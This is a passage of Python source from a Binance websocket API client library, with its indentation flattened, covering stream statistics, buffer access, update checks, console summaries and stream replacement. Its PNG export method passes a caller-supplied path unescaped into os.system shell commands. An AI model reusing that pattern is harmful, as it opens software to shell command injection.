return temp_stream_list
def get_stream_buffer_maxlen(self, stream_buffer_name=False):
"""
Get the maxlen value of the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If maxlen is not specified or is None, `stream_buffer` may grow to an arbitrary length. Otherwise, the
`stream_buffer` is bounded to the specified maximum length. Once a bounded length `stream_buffer` is full, when
new items are added, a corresponding number of items are discarded from the opposite end.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: int or False
"""
if stream_buffer_name is False:
try:
return self.stream_buffer.maxlen
except IndexError:
return False
else:
try:
return self.stream_buffers[stream_buffer_name].maxlen
except IndexError:
return False
except KeyError:
return False
def get_stream_receives_last_second(self, stream_id):
"""
        Get the number of receives of a specific stream from the last second
:param stream_id: id of a stream
:type stream_id: uuid
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
        :return: dict
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
        # how many bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
        :return: str
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: uuid
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
"""
Add the number of processed receives
:param stream_id: id of a stream
:type stream_id: uuid
"""
current_timestamp = int(time.time())
try:
self.stream_list[stream_id]['processed_receives_total'] += 1
except KeyError:
return False
try:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] += 1
except KeyError:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] = 1
with self.total_receives_lock:
self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
"""
Increase reconnect counter
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['logged_reconnects'].append(time.time())
self.stream_list[stream_id]['reconnects'] += 1
with self.reconnects_lock:
self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
"""
Increase the counter of transmitted payloads
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['processed_transmitted_total'] += 1
with self.total_transmitted_lock:
self.total_transmitted += 1
def is_manager_stopping(self):
"""
Returns `True` if the manager has a stop request, 'False' if not.
:return: bool
"""
        return self.stop_manager_request is not None
def is_exchange_type(self, exchange_type=False):
"""
Check the exchange type!
:param exchange_type: Valid types are `dex` and `cex`!
:type exchange_type: str
:return: bool
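        Example (illustrative sketch - assumes `ubwa` was created with `exchange="binance.com"`):
            ubwa.is_exchange_type("cex")  # returns True
            ubwa.is_exchange_type("dex")  # returns False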
"""
if exchange_type is False:
return False
if self.exchange == "binance.org" or \
self.exchange == "binance.org-testnet":
is_type = "dex"
elif self.exchange == "binance.com" or \
self.exchange == "binance.com-testnet" or \
self.exchange == "binance.com-margin" or \
self.exchange == "binance.com-margin-testnet" or \
self.exchange == "binance.com-isolated_margin" or \
self.exchange == "binance.com-isolated_margin-testnet" or \
self.exchange == "binance.com-futures" or \
self.exchange == "binance.com-futures-testnet" or \
self.exchange == "binance.com-coin-futures" or \
self.exchange == "binance.com-coin_futures" or \
self.exchange == "binance.je" or \
self.exchange == "binance.us" or \
self.exchange == "trbinance.com" or \
self.exchange == "jex.com":
is_type = "cex"
else:
logger.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for"
f"exchange={str(self.exchange)}")
return False
        return is_type == exchange_type
def is_stop_request(self, stream_id, exclude_kill_requests=False):
"""
        Does a specific stream have a stop_request?
:param stream_id: id of a stream
:type stream_id: uuid
:param exclude_kill_requests: if `True` this method returns `False` on kill_requests
:type exclude_kill_requests: bool
:return: bool
"""
logger.debug("BinanceWebSocketApiManager.is_stop_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['stop_request'] is True:
return True
elif self.is_manager_stopping():
return True
elif self.stream_list[stream_id]['kill_request'] is True and exclude_kill_requests is False:
return True
else:
return False
except KeyError:
return False
def is_stop_as_crash_request(self, stream_id):
"""
        Does a specific stream have a stop_as_crash_request?
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logger.debug("BinanceWebSocketApiManager.is_stop_as_crash_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['crash_request'] is True:
return True
except KeyError:
pass
if self.is_manager_stopping():
return True
else:
return False
def is_update_availabe(self):
"""
Is a new release of this package available?
:return: bool
"""
installed_version = self.get_version()
if ".dev" in installed_version:
installed_version = installed_version[:-4]
if self.get_latest_version() == installed_version:
return False
elif self.get_latest_version() == "unknown":
return False
else:
return True
def is_update_availabe_unicorn_fy(self):
"""
Is a new release of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ available?
:return: bool
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.is_update_availabe()
def is_update_availabe_check_command(self, check_command_version=False):
"""
Is a new release of `check_lucit_collector.py` available?
:return: bool
"""
installed_version = check_command_version
latest_version = self.get_latest_version_check_command()
if ".dev" in str(installed_version):
installed_version = installed_version[:-4]
if latest_version == installed_version:
return False
elif latest_version == "unknown":
return False
else:
return True
def kill_stream(self, stream_id):
"""
Kill a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logger.info("BinanceWebSocketApiManager.kill_stream(" + str(stream_id) + ")")
self.stream_list[stream_id]['kill_request'] = True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False, mode="FIFO"):
"""
Get oldest or latest entry from
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
and remove from FIFO/LIFO stack.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:param mode: How to read from the `stream_buffer` - "FIFO" (default) or "LIFO".
:type mode: str
:return: stream_data - str, dict or False
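        Example (illustrative consumer loop sketch - `ubwa` stands for an assumed running manager instance):
            while True:
                oldest_data = ubwa.pop_stream_data_from_stream_buffer()
                if oldest_data is False:
                    time.sleep(0.01)
                else:
                    print(oldest_data)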
"""
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
if mode.upper() == "FIFO":
stream_data = self.stream_buffer.popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffer.pop()
else:
return False
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
if mode.upper() == "FIFO":
stream_data = self.stream_buffers[stream_buffer_name].popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffers[stream_buffer_name].pop()
else:
return False
return stream_data
except IndexError:
return False
except KeyError:
return False
def pop_stream_signal_from_stream_signal_buffer(self):
"""
Get oldest entry from
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and remove from stack/pipe (FIFO stack)
:return: stream_signal - dict or False
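        Example (illustrative sketch - assumes the stream_signal_buffer was enabled when creating the manager):
            stream_signal = ubwa.pop_stream_signal_from_stream_signal_buffer()
            if stream_signal is not False:
                print(stream_signal)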
"""
try:
with self.stream_signal_buffer_lock:
stream_signal = self.stream_signal_buffer.popleft()
return stream_signal
except IndexError:
return False
def print_stream_info(self, stream_id, add_string=""):
"""
        Print all info about a specific stream, helps debugging :)
:param stream_id: id of a stream
:type stream_id: uuid
:param add_string: text to add to the output
:type add_string: str
:return: bool
"""
restart_requests_row = ""
binance_api_status_row = ""
stream_label_row = ""
status_row = ""
payload_row = ""
symbol_row = ""
dex_user_address_row = ""
last_static_ping_listen_key = ""
stream_info = self.get_stream_info(stream_id)
stream_row_color_prefix = ""
stream_row_color_suffix = ""
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
logged_reconnects_row = "\r\n logged_reconnects: "
row_prefix = ""
for timestamp in self.stream_list[stream_id]['logged_reconnects']:
logged_reconnects_row += row_prefix + \
datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
row_prefix = ", "
else:
logged_reconnects_row = ""
except KeyError:
return False
if "running" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m\r\n"
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "crashed" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "restarting" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "stopped" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
try:
if self.restart_requests[stream_id]['status']:
restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
except KeyError:
pass
if self.stream_list[stream_id]['markets'] == "!userData":
last_static_ping_listen_key = " last_static_ping_listen_key: " + \
str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
if self.stream_list[stream_id]['symbols'] is not False:
symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
if self.stream_list[stream_id]["payload"]:
payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
if self.stream_list[stream_id]["dex_user_address"] is not False:
dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
if self.stream_list[stream_id]["stream_label"] is not None:
stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
if isinstance(stream_info['ping_interval'], int):
ping_interval = f"{stream_info['ping_interval']} seconds"
else:
ping_interval = stream_info['ping_interval']
if isinstance(stream_info['ping_timeout'], int):
ping_timeout = f"{stream_info['ping_timeout']} seconds"
else:
ping_timeout = stream_info['ping_timeout']
if isinstance(stream_info['close_timeout'], int):
close_timeout = f"{stream_info['close_timeout']} seconds"
else:
close_timeout = stream_info['close_timeout']
try:
uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
print(str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
str(add_string) +
" stream_id:", str(stream_id), "\r\n" +
str(stream_label_row) +
" stream_buffer_maxlen:", str(stream_info['stream_buffer_maxlen']), "\r\n" +
" channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
" markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
str(symbol_row) +
" subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
str(payload_row) +
str(status_row) +
str(dex_user_address_row) +
f" ping_interval: {ping_interval}\r\n"
f" ping_timeout: {ping_timeout}\r\n"
f" close_timeout: {close_timeout}\r\n"
" start_time:", str(stream_info['start_time']), "\r\n"
" uptime:", str(uptime),
"since " + str(
datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
"\r\n" +
" reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
str(restart_requests_row) +
str(binance_api_status_row) +
str(last_static_ping_listen_key) +
" last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
" seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
" kill_request:", str(stream_info['kill_request']), "\r\n"
" stop_request:", str(stream_info['stop_request']), "\r\n"
" has_stopped:", str(stream_info['has_stopped']), "\r\n"
" seconds_since_has_stopped:",
str(stream_info['seconds_since_has_stopped']), "\r\n"
" current_receiving_speed:", str(current_receiving_speed), "\r\n" +
" processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
" transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
" stream_most_receives_per_second:",
str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
" stream_receives_per_second:",
str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
" stream_receives_per_minute:",
str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
" stream_receives_per_hour:",
str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
" stream_receives_per_day:",
str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n"
"===============================================================================================\r\n")
except KeyError:
self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False):
"""
Print an overview of all streams
:param add_string: text to add to the output
:type add_string: str
        :param disable_print: set to `True` to suppress printing and get the text as return value instead
:type disable_print: bool
"""
streams = len(self.stream_list)
active_streams = 0
crashed_streams = 0
restarting_streams = 0
stopped_streams = 0
active_streams_row = ""
restarting_streams_row = ""
stopped_streams_row = ""
all_receives_per_second = 0.0
current_receiving_speed = 0
streams_with_stop_request = 0
stream_rows = ""
crashed_streams_row = ""
binance_api_status_row = ""
received_bytes_per_x_row = ""
streams_with_stop_request_row = ""
stream_buffer_row = ""
highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
f"(reached at " \
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError:
return ""
for stream_id in temp_stream_list:
stream_row_color_prefix = ""
stream_row_color_suffix = ""
current_receiving_speed += self.get_current_receiving_speed(stream_id)
stream_statistic = self.get_stream_statistic(stream_id)
if self.stream_list[stream_id]['status'] == "running":
active_streams += 1
all_receives_per_second += stream_statistic['stream_receives_per_second']
try:
if self.restart_requests[stream_id]['status'] == "restarted":
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
try:
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 4:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
elif self.stream_list[stream_id]['status'] == "stopped":
stopped_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif self.stream_list[stream_id]['status'] == "restarting":
restarting_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif "crashed" in self.stream_list[stream_id]['status']:
crashed_streams += 1
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
if self.stream_list[stream_id]['stream_label'] is not None:
if len(self.stream_list[stream_id]['stream_label']) > 18:
stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
self.fill_up_space_right(17, stream_label) + "|" + \
self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
+ "|" + stream_row_color_prefix + \
self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
stream_row_color_suffix + "\r\n "
if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
self.stream_list[stream_id]['status'] == "running":
streams_with_stop_request += 1
if streams_with_stop_request >= 1:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
if crashed_streams >= 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
+ stream_row_color_suffix + "\r\n"
total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
self.get_human_bytesize(self.get_total_received_bytes())) + ")"
try:
received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2))\
+ " gB)"
if self.get_stream_buffer_length() > 50:
stream_row_color_prefix = "\033[1m\033[34m"
stream_row_color_suffix = "\033[0m"
stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
str(self.get_stream_buffer_length()) + "\r\n"
stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
" (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
stream_row_color_suffix + "\r\n"
if active_streams > 0:
active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
if restarting_streams > 0:
restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
if stopped_streams > 0:
stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
if self.binance_api_status['weight'] is not None:
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + \
str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
try:
print_text = (
str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
" uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
" streams: " + str(streams) + "\r\n" +
str(active_streams_row) +
str(crashed_streams_row) +
str(restarting_streams_row) +
str(stopped_streams_row) +
str(streams_with_stop_request_row) +
" subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
str(stream_buffer_row) +
" current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
" average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
" highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
" total_receives: " + str(self.total_receives) + "\r\n"
" total_received_bytes: " + str(total_received_bytes) + "\r\n"
" total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
" stream_buffer_maxlen: " + str(self.stream_buffer_maxlen) + "\r\n" +
str(binance_api_status_row) +
" process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
"\r\n" + str(add_string) +
" ---------------------------------------------------------------------------------------------\r\n"
" stream_id | stream_label | last | average | peak | recon\r\n"
" ---------------------------------------------------------------------------------------------\r\n"
" " + str(stream_rows) +
"---------------------------------------------------------------------------------------------\r\n"
" all_streams |" +
self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
self.fill_up_space_left(8, self.reconnects) + "\r\n" +
"===============================================================================================\r\n"
)
if disable_print:
                    # `sys.platform` reports "win32" on Windows, so match the lowercase "win" prefix
                    if sys.platform.startswith('win'):
print_text = self.remove_ansi_escape_codes(print_text)
return print_text
else:
print(print_text)
except UnboundLocalError:
pass
except ZeroDivisionError:
pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
"""
Create a PNG image file with the console output of `print_summary()`
*LINUX ONLY* It should not be hard to make it OS independent:
https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/61
:param print_summary_export_path: If you want to export the output of print_summary() to an image,
please provide a path like "/var/www/html/". `View the Wiki!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
:type print_summary_export_path: str
        :param hight_per_row: set the height per row for the image height calculation
:type hight_per_row: int
:return: bool
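        Example (illustrative sketch - the path is just an assumption and must exist and be writable):
            ubwa.print_summary_to_png("/var/www/html/", hight_per_row=12.5)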
"""
print_text = self.print_summary(disable_print=True)
# Todo:
# 1. Handle paths right
# 2. Use PythonMagick instead of Linux ImageMagick
with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
print(self.remove_ansi_escape_codes(print_text), file=text_file)
try:
            image_height = print_text.count("\n") * hight_per_row + 15
except AttributeError:
return False
        os.system('convert -size 720x' + str(image_height) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
                  '+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
                  print_summary_export_path + 'print_summary_plain.png')
os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
'-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
'"$(date)" ' + print_summary_export_path + 'print_summary.png')
return True
@staticmethod
def remove_ansi_escape_codes(text):
"""
Remove ANSI escape codes from the text string!
:param text: str
:return: str
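Example (sketch):
    BinanceWebSocketApiManager.remove_ansi_escape_codes("\033[1m\033[32mok\033[0m")
    # returns "ok"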
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
stream_id,
new_channels,
new_markets,
new_stream_label=None,
new_stream_buffer_name=False,
new_api_key=False,
new_api_secret=False,
new_symbols=False,
new_output="raw_data",
new_ping_interval=20,
new_ping_timeout=20,
new_close_timeout=10,
new_stream_buffer_maxlen=None):
"""
Replace a stream
If you want to start a stream with a new config, it is recommended to first start a new stream with the new
settings and to close the old stream only after the new stream has received its first data. This way your data
stays consistent.
:param stream_id: id of the old stream
:type stream_id: uuid
:param new_channels: the new channel list for the stream
:type new_channels: str, tuple, list, set
:param new_markets: the new markets list for the stream
:type new_markets: str, tuple, list, set
:param new_stream_label: provide a stream_label to identify the stream
:type new_stream_label: str
:param new_stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type new_stream_buffer_name: bool or str
:param new_api_key: provide a valid Binance API key
:type new_api_key: str
:param new_api_secret: provide a valid Binance API secret
:type new_api_secret: str
:param new_symbols: provide the symbols for isolated_margin user_data streams
:type new_symbols: str
:param new_output: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to convert
with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise the output
remains unchanged and gets delivered as received from the endpoints
:type new_output: str
:param new_ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_interval: int or None
:param new_ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_timeout: int or None
:param new_close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_close_timeout: int or None
:param new_stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type new_stream_buffer_maxlen: int or None
:return: new_stream_id or 'False'
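Example (sketch; assumes a manager instance `ubwa` and an existing `old_stream_id`):
    new_stream_id = ubwa.replace_stream(old_stream_id, ['trade'], ['btcusdt'],
                                        new_stream_label="replacement")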
"""
# start a new stream and stop the old one only after the new stream has received its first record
new_stream_id = self.create_stream(new_channels,
new_markets,
new_stream_label,
new_stream_buffer_name,
new_api_key,
new_api_secret,
new_symbols,
new_output,
new_ping_interval,
new_ping_timeout,
new_close_timeout,
new_stream_buffer_maxlen)
if self.wait_till_stream_has_started(new_stream_id):
self.stop_stream(stream_id)
return new_stream_id
def run(self):
"""
This method overrides `threading.Thread.run()` and starts the management threads
"""
thread_frequent_checks = threading.Thread(target=self._frequent_checks)
thread_frequent_checks.start()
